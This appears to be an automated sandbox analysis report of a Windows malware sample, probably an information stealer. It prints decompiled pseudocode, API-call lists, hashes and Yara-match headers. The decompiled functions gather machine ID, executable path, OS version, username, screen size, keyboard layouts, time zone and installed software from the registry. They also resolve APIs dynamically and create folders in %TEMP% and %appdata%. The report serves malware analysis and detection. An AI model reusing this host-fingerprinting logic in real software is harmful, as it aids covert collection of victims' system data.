				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}








































                                                                                                                                                                                          0x00408328
                                                                                                                                                                                          0x00408329
                                                                                                                                                                                          0x0040832b
                                                                                                                                                                                          0x00408330
                                                                                                                                                                                          0x00408330
                                                                                                                                                                                          0x00408332
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408337
                                                                                                                                                                                          0x00408338
                                                                                                                                                                                          0x00408339
                                                                                                                                                                                          0x0040833b
                                                                                                                                                                                          0x00408341
                                                                                                                                                                                          0x00408352
                                                                                                                                                                                          0x00408353
                                                                                                                                                                                          0x00408358
                                                                                                                                                                                          0x0040835b
                                                                                                                                                                                          0x0040835e
                                                                                                                                                                                          0x00408368
                                                                                                                                                                                          0x00408373
                                                                                                                                                                                          0x0040837e
                                                                                                                                                                                          0x00408389
                                                                                                                                                                                          0x0040838e
                                                                                                                                                                                          0x00408393
                                                                                                                                                                                          0x00408396
                                                                                                                                                                                          0x004083a3
                                                                                                                                                                                          0x004083ae
                                                                                                                                                                                          0x004083b8
                                                                                                                                                                                          0x004083c7
                                                                                                                                                                                          0x004083d1
                                                                                                                                                                                          0x004083de
                                                                                                                                                                                          0x004083eb
                                                                                                                                                                                          0x004083f3
                                                                                                                                                                                          0x004083f8
                                                                                                                                                                                          0x004083fa
                                                                                                                                                                                          0x004083fc
                                                                                                                                                                                          0x00408401
                                                                                                                                                                                          0x00408404
                                                                                                                                                                                          0x00408411
                                                                                                                                                                                          0x0040841c
                                                                                                                                                                                          0x00408426
                                                                                                                                                                                          0x00408435
                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                          0x0040844d
                                                                                                                                                                                          0x00408456
                                                                                                                                                                                          0x00408458
                                                                                                                                                                                          0x0040845a
                                                                                                                                                                                          0x00408461
                                                                                                                                                                                          0x00408475
                                                                                                                                                                                          0x0040847c
                                                                                                                                                                                          0x0040847c
                                                                                                                                                                                          0x00408490
                                                                                                                                                                                          0x004084a3
                                                                                                                                                                                          0x004084aa
                                                                                                                                                                                          0x004084b4
                                                                                                                                                                                          0x004084bb
                                                                                                                                                                                          0x004084c9
                                                                                                                                                                                          0x004084d6
                                                                                                                                                                                          0x004084e9
                                                                                                                                                                                          0x004084ee
                                                                                                                                                                                          0x004084fc
                                                                                                                                                                                          0x00408512
                                                                                                                                                                                          0x0040851f
                                                                                                                                                                                          0x00408535
                                                                                                                                                                                          0x00408542
                                                                                                                                                                                          0x00408558
                                                                                                                                                                                          0x00408565
                                                                                                                                                                                          0x0040857b
                                                                                                                                                                                          0x00408588
                                                                                                                                                                                          0x0040859e
                                                                                                                                                                                          0x004085ab
                                                                                                                                                                                          0x004085c1
                                                                                                                                                                                          0x004085ce
                                                                                                                                                                                          0x004085e4
                                                                                                                                                                                          0x004085f1
                                                                                                                                                                                          0x00408607
                                                                                                                                                                                          0x00408614
                                                                                                                                                                                          0x0040862a
                                                                                                                                                                                          0x00408637
                                                                                                                                                                                          0x0040864d
                                                                                                                                                                                          0x0040865a
                                                                                                                                                                                          0x00408670
                                                                                                                                                                                          0x0040867d
                                                                                                                                                                                          0x00408693
                                                                                                                                                                                          0x004086a0
                                                                                                                                                                                          0x004086b6
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408739
                                                                                                                                                                                          0x0040873c
                                                                                                                                                                                          0x0040873f
                                                                                                                                                                                          0x0040874c
                                                                                                                                                                                          0x00408759
                                                                                                                                                                                          0x00408766
                                                                                                                                                                                          0x00408773
                                                                                                                                                                                          0x00408780

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                          • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                          • API String ID: 1305945209-1089150275
                                                                                                                                                                                          • Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                                                                                                                                                                                          • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417278, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E00417278(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed char _t59;
				intOrPtr* _t60;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t173;
				void* _t181;
				intOrPtr _t184;
				intOrPtr _t185;

				_t182 = __esi;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				asm("das");
				 *_t59 =  *_t59 + _t59;
				 *__edx =  *__edx + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 & _t59;
				 *_t59 =  *_t59 + _t59;
				_t60 = _t59 +  *_t59;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t184 = _t185;
				_t143 = 0xc;
				do {
					_push(0);
					_push(0);
					_t143 = _t143 - 1;
					_t191 = _t143;
				} while (_t143 != 0);
				_t142 = _t60;
				_push(_t184);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t142, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t142, _t181, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t191);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v40);
				E004037DC( &_v68, "Screen: ",  *_t142);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v60);
				_push( *_t142);
				_push("Layouts: ");
				E00416FB8( &_v80, _t142, _t181, _t182);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("LocalTime: ");
				E00417198( &_v84, _t142, _t182);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("Zone: ");
				E00417098( &_v88, _t142, _t181, _t182, _t191);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				E00416748( &_v92, _t142, _t181, _t182);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t142);
				E00416B94( &_v96, _t142, _t181, _t182, _t191);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t142);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t142, _t181, _t182);
				E00403798(_t142, _v100);
				_t173 = 0x4175a8;
				 *[fs:eax] = _t173;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}



































                                                                                                                                                                                          0x00417278
                                                                                                                                                                                          0x00417278
                                                                                                                                                                                          0x0041727a
                                                                                                                                                                                          0x0041727c
                                                                                                                                                                                          0x0041727d
                                                                                                                                                                                          0x0041727f
                                                                                                                                                                                          0x00417281
                                                                                                                                                                                          0x00417283
                                                                                                                                                                                          0x00417284
                                                                                                                                                                                          0x00417286
                                                                                                                                                                                          0x00417288
                                                                                                                                                                                          0x0041728a
                                                                                                                                                                                          0x0041728e
                                                                                                                                                                                          0x00417291
                                                                                                                                                                                          0x00417293
                                                                                                                                                                                          0x00417298
                                                                                                                                                                                          0x00417298
                                                                                                                                                                                          0x0041729a
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                          0x004172a4
                                                                                                                                                                                          0x004172a5
                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                          0x004172b0
                                                                                                                                                                                          0x004172b8
                                                                                                                                                                                          0x004172bd
                                                                                                                                                                                          0x004172c0
                                                                                                                                                                                          0x004172cc
                                                                                                                                                                                          0x004172d1
                                                                                                                                                                                          0x004172d3
                                                                                                                                                                                          0x004172dd
                                                                                                                                                                                          0x004172e2
                                                                                                                                                                                          0x004172e5
                                                                                                                                                                                          0x004172f1
                                                                                                                                                                                          0x004172f6
                                                                                                                                                                                          0x004172f8
                                                                                                                                                                                          0x00417300
                                                                                                                                                                                          0x00417305
                                                                                                                                                                                          0x00417308
                                                                                                                                                                                          0x00417315
                                                                                                                                                                                          0x00417320
                                                                                                                                                                                          0x00417325
                                                                                                                                                                                          0x0041732b
                                                                                                                                                                                          0x00417330
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x0041733b
                                                                                                                                                                                          0x00417340
                                                                                                                                                                                          0x00417343
                                                                                                                                                                                          0x00417350
                                                                                                                                                                                          0x0041735a
                                                                                                                                                                                          0x00417369
                                                                                                                                                                                          0x00417374
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x0041737f
                                                                                                                                                                                          0x00417384
                                                                                                                                                                                          0x00417387
                                                                                                                                                                                          0x0041738f
                                                                                                                                                                                          0x00417394
                                                                                                                                                                                          0x00417397
                                                                                                                                                                                          0x0041739c
                                                                                                                                                                                          0x004173a9
                                                                                                                                                                                          0x004173b3
                                                                                                                                                                                          0x004173c2
                                                                                                                                                                                          0x004173cd
                                                                                                                                                                                          0x004173d2
                                                                                                                                                                                          0x004173df
                                                                                                                                                                                          0x004173e4
                                                                                                                                                                                          0x004173e7
                                                                                                                                                                                          0x004173f6
                                                                                                                                                                                          0x004173fb
                                                                                                                                                                                          0x004173fe
                                                                                                                                                                                          0x0041740b
                                                                                                                                                                                          0x00417415
                                                                                                                                                                                          0x0041741a
                                                                                                                                                                                          0x0041741c
                                                                                                                                                                                          0x00417424
                                                                                                                                                                                          0x00417429
                                                                                                                                                                                          0x0041742c
                                                                                                                                                                                          0x00417438
                                                                                                                                                                                          0x0041743d
                                                                                                                                                                                          0x0041743f
                                                                                                                                                                                          0x00417447
                                                                                                                                                                                          0x0041744c
                                                                                                                                                                                          0x0041744f
                                                                                                                                                                                          0x0041745b
                                                                                                                                                                                          0x00417460
                                                                                                                                                                                          0x00417462
                                                                                                                                                                                          0x0041746a
                                                                                                                                                                                          0x0041746f
                                                                                                                                                                                          0x00417472
                                                                                                                                                                                          0x0041747e
                                                                                                                                                                                          0x00417483
                                                                                                                                                                                          0x00417488
                                                                                                                                                                                          0x0041748d
                                                                                                                                                                                          0x00417490
                                                                                                                                                                                          0x0041749c
                                                                                                                                                                                          0x004174a3
                                                                                                                                                                                          0x004174a8
                                                                                                                                                                                          0x004174ad
                                                                                                                                                                                          0x004174b2
                                                                                                                                                                                          0x004174b5
                                                                                                                                                                                          0x004174ba
                                                                                                                                                                                          0x004174c6
                                                                                                                                                                                          0x004174cd
                                                                                                                                                                                          0x004174d2
                                                                                                                                                                                          0x004174d4
                                                                                                                                                                                          0x004174e5
                                                                                                                                                                                          0x004174ec
                                                                                                                                                                                          0x004174f4
                                                                                                                                                                                          0x004174fe
                                                                                                                                                                                          0x00417505
                                                                                                                                                                                          0x00417508
                                                                                                                                                                                          0x0041750b
                                                                                                                                                                                          0x00417518
                                                                                                                                                                                          0x00417525
                                                                                                                                                                                          0x0041752d
                                                                                                                                                                                          0x0041753a
                                                                                                                                                                                          0x00417542
                                                                                                                                                                                          0x0041754f
                                                                                                                                                                                          0x0041755c
                                                                                                                                                                                          0x00417569
                                                                                                                                                                                          0x0041757b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                            • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                            • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                            • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                          • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                          • API String ID: 75899496-943277980
                                                                                                                                                                                          • Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                          • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041727C, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                          			E0041727C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t59;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr _t172;
				void* _t180;
				intOrPtr _t183;
				intOrPtr _t184;

				_t181 = __esi;
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__edx =  *__edx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax & __eax;
				 *__eax =  *__eax + __eax;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				_t183 = _t184;
				_t142 = 0xc;
				do {
					_push(0);
					_push(0);
					_t142 = _t142 - 1;
					_t189 = _t142;
				} while (_t142 != 0);
				_t141 = _t59;
				_push(_t183);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t141, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t141, _t180, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t189);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v40);
				E004037DC( &_v68, "Screen: ",  *_t141);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v60);
				_push( *_t141);
				_push("Layouts: ");
				E00416FB8( &_v80, _t141, _t180, _t181);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("LocalTime: ");
				E00417198( &_v84, _t141, _t181);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("Zone: ");
				E00417098( &_v88, _t141, _t180, _t181, _t189);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				E00416748( &_v92, _t141, _t180, _t181);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t141);
				E00416B94( &_v96, _t141, _t180, _t181, _t189);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t141);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t141, _t180, _t181);
				E00403798(_t141, _v100);
				_t172 = 0x4175a8;
				 *[fs:eax] = _t172;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}


































                                                                                                                                                                                          0x0041727c
                                                                                                                                                                                          0x0041727c
                                                                                                                                                                                          0x0041727d
                                                                                                                                                                                          0x0041727f
                                                                                                                                                                                          0x00417281
                                                                                                                                                                                          0x00417283
                                                                                                                                                                                          0x00417284
                                                                                                                                                                                          0x00417286
                                                                                                                                                                                          0x00417288
                                                                                                                                                                                          0x0041728a
                                                                                                                                                                                          0x0041728e
                                                                                                                                                                                          0x00417291
                                                                                                                                                                                          0x00417293
                                                                                                                                                                                          0x00417298
                                                                                                                                                                                          0x00417298
                                                                                                                                                                                          0x0041729a
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x0041729c
                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                          0x004172a4
                                                                                                                                                                                          0x004172a5
                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                          0x004172b0
                                                                                                                                                                                          0x004172b8
                                                                                                                                                                                          0x004172bd
                                                                                                                                                                                          0x004172c0
                                                                                                                                                                                          0x004172cc
                                                                                                                                                                                          0x004172d1
                                                                                                                                                                                          0x004172d3
                                                                                                                                                                                          0x004172dd
                                                                                                                                                                                          0x004172e2
                                                                                                                                                                                          0x004172e5
                                                                                                                                                                                          0x004172f1
                                                                                                                                                                                          0x004172f6
                                                                                                                                                                                          0x004172f8
                                                                                                                                                                                          0x00417300
                                                                                                                                                                                          0x00417305
                                                                                                                                                                                          0x00417308
                                                                                                                                                                                          0x00417315
                                                                                                                                                                                          0x00417320
                                                                                                                                                                                          0x00417325
                                                                                                                                                                                          0x0041732b
                                                                                                                                                                                          0x00417330
                                                                                                                                                                                          0x00417333
                                                                                                                                                                                          0x0041733b
                                                                                                                                                                                          0x00417340
                                                                                                                                                                                          0x00417343
                                                                                                                                                                                          0x00417350
                                                                                                                                                                                          0x0041735a
                                                                                                                                                                                          0x00417369
                                                                                                                                                                                          0x00417374
                                                                                                                                                                                          0x00417379
                                                                                                                                                                                          0x0041737f
                                                                                                                                                                                          0x00417384
                                                                                                                                                                                          0x00417387
                                                                                                                                                                                          0x0041738f
                                                                                                                                                                                          0x00417394
                                                                                                                                                                                          0x00417397
                                                                                                                                                                                          0x0041739c
                                                                                                                                                                                          0x004173a9
                                                                                                                                                                                          0x004173b3
                                                                                                                                                                                          0x004173c2
                                                                                                                                                                                          0x004173cd
                                                                                                                                                                                          0x004173d2
                                                                                                                                                                                          0x004173df
                                                                                                                                                                                          0x004173e4
                                                                                                                                                                                          0x004173e7
                                                                                                                                                                                          0x004173f6
                                                                                                                                                                                          0x004173fb
                                                                                                                                                                                          0x004173fe
                                                                                                                                                                                          0x0041740b
                                                                                                                                                                                          0x00417415
                                                                                                                                                                                          0x0041741a
                                                                                                                                                                                          0x0041741c
                                                                                                                                                                                          0x00417424
                                                                                                                                                                                          0x00417429
                                                                                                                                                                                          0x0041742c
                                                                                                                                                                                          0x00417438
                                                                                                                                                                                          0x0041743d
                                                                                                                                                                                          0x0041743f
                                                                                                                                                                                          0x00417447
                                                                                                                                                                                          0x0041744c
                                                                                                                                                                                          0x0041744f
                                                                                                                                                                                          0x0041745b
                                                                                                                                                                                          0x00417460
                                                                                                                                                                                          0x00417462
                                                                                                                                                                                          0x0041746a
                                                                                                                                                                                          0x0041746f
                                                                                                                                                                                          0x00417472
                                                                                                                                                                                          0x0041747e
                                                                                                                                                                                          0x00417483
                                                                                                                                                                                          0x00417488
                                                                                                                                                                                          0x0041748d
                                                                                                                                                                                          0x00417490
                                                                                                                                                                                          0x0041749c
                                                                                                                                                                                          0x004174a3
                                                                                                                                                                                          0x004174a8
                                                                                                                                                                                          0x004174ad
                                                                                                                                                                                          0x004174b2
                                                                                                                                                                                          0x004174b5
                                                                                                                                                                                          0x004174ba
                                                                                                                                                                                          0x004174c6
                                                                                                                                                                                          0x004174cd
                                                                                                                                                                                          0x004174d2
                                                                                                                                                                                          0x004174d4
                                                                                                                                                                                          0x004174e5
                                                                                                                                                                                          0x004174ec
                                                                                                                                                                                          0x004174f4
                                                                                                                                                                                          0x004174fe
                                                                                                                                                                                          0x00417505
                                                                                                                                                                                          0x00417508
                                                                                                                                                                                          0x0041750b
                                                                                                                                                                                          0x00417518
                                                                                                                                                                                          0x00417525
                                                                                                                                                                                          0x0041752d
                                                                                                                                                                                          0x0041753a
                                                                                                                                                                                          0x00417542
                                                                                                                                                                                          0x0041754f
                                                                                                                                                                                          0x0041755c
                                                                                                                                                                                          0x00417569
                                                                                                                                                                                          0x0041757b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                            • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                          • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                            • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                            • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
